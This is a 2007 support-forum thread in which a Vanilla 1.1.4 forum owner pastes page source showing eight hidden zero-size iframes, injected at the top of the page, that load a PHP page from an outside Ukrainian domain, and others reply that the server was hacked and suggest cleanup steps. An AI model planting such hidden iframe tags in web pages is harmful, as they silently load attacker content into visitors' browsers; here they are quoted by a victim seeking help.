Vanilla 1 is no longer supported or maintained. If you need a copy, you can get it here.
HackerOne users: Testing against this community violates our program's Terms of Service and will result in your bounty being denied.
Forum Hack???
Hi Team,
Hope you can help.
I noticed in my forum that the "Add your comments" form was starting to show at the top of the first topic comment, which effectively covered over half of the first comment so you cant read the full comment. I dont know how this happened and i cant get rid of it. I am running Vanilla 1.1.4 and everything seems up to date.
When i view the page source, the following appears at the top of the source page. Has my site been hacked and how do i get rid of it???
<iframe src="http://checkengine.org.ua/forum/images/avatars/gallery1/index.php" width=0 height=0 border=0></iframe>
<iframe src="http://checkengine.org.ua/forum/images/avatars/gallery1/index.php" width=0 height=0 border=0></iframe>
<iframe src="http://checkengine.org.ua/forum/images/avatars/gallery1/index.php" width=0 height=0 border=0></iframe>
<iframe src="http://checkengine.org.ua/forum/images/avatars/gallery1/index.php" width=0 height=0 border=0></iframe>
<iframe src="http://checkengine.org.ua/forum/images/avatars/gallery1/index.php" width=0 height=0 border=0></iframe>
<iframe src="http://checkengine.org.ua/forum/images/avatars/gallery1/index.php" width=0 height=0 border=0></iframe>
<iframe src="http://checkengine.org.ua/forum/images/avatars/gallery1/index.php" width=0 height=0 border=0></iframe>
<iframe src="http://checkengine.org.ua/forum/images/avatars/gallery1/index.php" width=0 height=0 border=0></iframe>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-ca">
0
This discussion has been closed.
Comments
I'd be looking at the code in one of your add-ons?
Posted: Saturday, 29 December 2007 at 10:11AM
You should upload the vanilla files on top of the corrupted one, upload your add-ons and check the files in the /conf/ folder.
Finally you should contact your provider to know how it happens. Let us know if Vanilla or an add-on is vulnerable.
Your server has been hacked. Most likely, someone manages to execute a script on your server (after have uploaded it?), to add the iframe tag to every index.* or default.* files.
As far as I know, there is no such vulnerability published so I doubt the vulnerability used is in vanilla or one of its add-ons but it is possible.